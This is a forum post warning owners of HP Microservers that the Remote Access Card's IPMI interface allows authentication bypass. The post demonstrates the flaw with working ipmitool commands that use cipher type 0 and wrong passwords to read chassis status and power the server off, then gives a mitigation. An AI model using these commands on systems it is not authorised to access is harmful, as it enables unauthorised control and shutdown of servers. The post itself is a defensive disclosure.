Jump to content
RESET Forums (homeservershow.com)

Careful! Authentication bypass in Microserver Remote Access Card

e4Bkt

By e4Bkt,
in Microserver N54L, N40L, Etc

 Share

Recommended Posts

e4Bkt HSS Member

e4Bkt

Posted
Posted

I registered here just to share this warning.

 

HP recently published a security advisory. Document c03844348. It only mentions servers with iLO hardware, but the Microserver's Remote Access Card (615095-B21) is vulnerable too.

 

The issue is authentication bypass. Anybody can send commands to the box without knowing the password. Firmware 1.2 and 1.3 are both vulnerable.

 

Here's how it works. I'll query the status of the box from a remote linux system using password 'abc'

 

$ ipmitool -I lanplus -C 0 -H 192.168.1.141 -U admin -P abc chassis status

System Power         : on
Power Overload       : false
Power Interlock      : inactive
Main Power Fault     : false
Power Control Fault  : false
Power Restore Policy : always-off
Last Power Event     : command
Chassis Intrusion    : inactive
Front-Panel Lockout  : inactive
Drive Fault          : false
Cooling/Fan Fault    : false
 
Cool, the box is on. Should I know that? Can I change that? The correct password is not 'abc'
 
$ ipmitool -I lanplus -C 0 -H 192.168.1.141 -U admin -P 123 power off
Chassis Power Control: Down/Off
 
I used a different password and didn't get any errors back...
 
$ ipmitool -I lanplus -C 0 -H 192.168.1.141 -U admin -P xyz chassis status
System Power         : off
Power Overload       : false
Power Interlock      : inactive
Main Power Fault     : false
Power Control Fault  : false
Power Restore Policy : always-off
Last Power Event     : command
Chassis Intrusion    : inactive
Front-Panel Lockout  : inactive
Drive Fault          : false
Cooling/Fan Fault    : false
 
Crap. Now the box is off. 'abc', '123' and 'xyz' are not the correct password. Setting cyphertype to zero allows complete authentication bypass.
 
Unchecking "enable IPMI over LAN" prevents the problem unless, y'know, you wanted to actually use IPMI for something...
  • Like 1
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing
×
×
  • Create New...